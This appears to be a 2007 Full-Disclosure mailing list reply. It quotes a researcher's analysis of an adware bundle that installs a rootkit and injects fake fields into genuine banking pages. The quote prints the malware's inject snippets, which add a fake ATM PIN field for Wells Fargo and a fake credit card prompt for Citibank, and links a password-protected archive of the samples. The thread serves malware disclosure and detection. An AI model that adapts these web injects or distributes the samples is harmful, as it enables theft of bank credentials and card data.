Full Disclosure mailing list archives
Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Net Tech" <net.tech11 () gmail com>
Date: Tue, 13 Mar 2007 13:36:10 -0400
Why is this "genius" sending virus infected attachments to the list? The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"... it steals passwords and logs keystrokes entered into certain financial Web sites. On 3/12/07, Thierry Zoller <Thierry () zoller lu> wrote:
Dear list, Whoever deals with these poeple and thinks they are a benign Adware company (and thus spreads their bundles. Check this : Ignoring the fact that they basicaly install a Rootkit, I attached a few files I reversed, they install a DLL that does not directly KEYLOG your banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page asking you to enter more details (like PIN, Magic Password etc), then capture that data and transmit it (I did no further investigation) http://secdev.zoller.lu/system32.zip Pass: 123 I am disgusted. They even created their own XML parser for this ... An extract of HTML code they inject : ------------------------------------- <inject url="wellsfargo" before="name=userid autocomplete='off'></DIV>" what=" <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV> " block="alt=Go" check="pin" quan="4" content="d" > </inject> ------------------------------------ Attached the main files (pass 123), feel free to add this as HIPS or whatever signatures, those interested in a complete reversal can contact me to receive the EXE in question. I have no more time feel free to dig deeper. I especialy liked this : ------------------------ <inject url="citibank.com" <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR> Puke.. -- http://secdev.zoller.lu Thierry Zoller _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god.. Thierry Zoller (Mar 12)
- Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god.. Net Tech (Mar 13)
- Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god.. Thierry Zoller (Mar 13)
- Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god.. Net Tech (Mar 13)